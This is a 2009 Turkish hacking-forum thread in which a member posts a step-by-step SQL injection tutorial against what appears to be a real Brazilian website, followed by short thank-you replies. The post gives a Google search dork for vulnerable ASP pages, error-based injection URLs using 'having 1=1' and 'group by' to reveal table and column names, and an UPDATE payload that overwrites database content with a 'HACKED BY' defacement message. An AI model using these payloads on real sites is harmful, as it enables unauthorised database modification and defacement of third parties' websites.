İPUCU

Web & Server Güvenliği Doğru web ve veritabanı sunucusu güvenliği sağlanmadan, bilgisayar korsanları hassas verilerinize erişebilir. Web, Sunucu ve veritabanı güvenliğini nasıl sağlayacağınızı buradan öğrenebilirsiniz.

Seçenekler

Hiç Site Hacklemedinmi Bu TaM SenLik [URL XSS]

08-06-2009 14:07
#1
onlinebow1 - ait Kullanıcı Resmi (Avatar)
Üye
Üyelik tarihi:
01/2009
Nereden:
S@K@RY@
Mesajlar:
571
Teşekkür (Etti):
2
Teşekkür (Aldı):
176
Konular:
56
Ticaret:
(0) %
S A arkadaşlar Sizlere Sql İnjection Dan Bahsedeceğim Bir hafta önce yeni çıkmış açık üzrinde tabi

Google Arama Kodumuz=inurlroduct_detail.asp?catalogid=8

Tabi Burdaki 8 numarasını değiştirebilirsiniz çok fazla seçenek varama 8 ve 2 numarasında daha çok site çıkmaktadır ewet başlayalım
Örneklerle;
1.aşama=http://www.aguzzo.com.br/news.asp?id=11 önümüze geldi ve sonra
http://www.aguzzo.com.br/news.asp?id=11’a hatayı alıyoruz

2.aşama=http://www.aguzzo.com.br/news.asp?id=11 having 1=1

Ve Önümüze Tablo İsmi geliyor ’TBL_NOTICIAS.not_int_codigo’

Bunu Şöle Yapıyoruz
http://www.aguzzo.com.br/news.asp?id=11 group by TBL_NOTICIAS.not_int_codigo

Ekledik Ve Önümüze Hem Tablo İsmi Hemde Kolon İsmi geliyor

’TBL_NOTICIAS.not_str_titulo’
3.aşama=ve sitenin sonuna son olarak şunu ekliyoruz

+update+tabloismi+set+kolonismi=’ İstediğnizi yazın’


http://www.aguzzo.com.br/news.asp?id...ot_str_titulo=' HACKED BY THE ESREF'

Ve Bukdaar Kolay Gelsin hepinize



alıntıııııııııııı
Kullanıcı İmzası
İMZA ATMIYORUZ DİYE KUÇUMSEMEYİN
BİZ GEREKTİĞİ YERE PARMAK BASARIZ!!!

GAME OWER
son_prenses, banlı Teşekkür etti.

08-06-2009 17:11
#2
atlas_tr - ait Kullanıcı Resmi (Avatar)
Üye
Üyelik tarihi:
01/2008
Nereden:
NErDe OLsam BEğeNİRsin
Mesajlar:
2.383
Teşekkür (Etti):
19
Teşekkür (Aldı):
189
Konular:
389
Ticaret:
(0) %
saol kardeş bu /news.asp?id=11 bölümü işime yaradı
Kullanıcı İmzası
banlı Teşekkür etti.
14-06-2009 10:41
#3
Dark_AnqeL - ait Kullanıcı Resmi (Avatar)
E-Mail onayı yapılmamış üye
Üyelik tarihi:
06/2009
Mesajlar:
442
Teşekkür (Etti):
40
Teşekkür (Aldı):
20
Konular:
27
Ticaret:
(0) %
paylasım ıcın tskrler
14-06-2009 12:01
#4
SiZofReNY - ait Kullanıcı Resmi (Avatar)
Üye
Üyelik tarihi:
06/2009
Mesajlar:
13
Teşekkür (Etti):
0
Teşekkür (Aldı):
5
Konular:
3
Ticaret:
(0) %
eyw. Sağolasın kardeş
Kullanıcı İmzası
_|\___________________,,,_
/ `---
۵۵۵۵۵۵ ''| ]

/_==o___● N i K o T i N ●_ __|
),---.(_(__) /
// (\) ),----".'
//___//
`-----'
14-06-2009 13:24
#5
Üyelik tarihi:
04/2009
Nereden:
Heryerden
Mesajlar:
494
Teşekkür (Etti):
35
Teşekkür (Aldı):
39
Konular:
13
Ticaret:
(0) %
sağolasın arşive ekliyorum
Kullanıcı İmzası
Türk Hack Team
Ne Mutlu Türküm Diyene
[/SIZE]

Bookmarks


« Önceki Konu | Sonraki Konu »
Seçenekler

Yetkileriniz
Sizin Yeni Konu Acma Yetkiniz var yok
You may not post replies
Sizin eklenti yükleme yetkiniz yok
You may not edit your posts

BB code is Açık
Smileler Açık
[IMG] Kodları Açık
HTML-Kodları Kapalı
Trackbacks are Kapalı
Pingbacks are Kapalı
Refbacks are Kapalı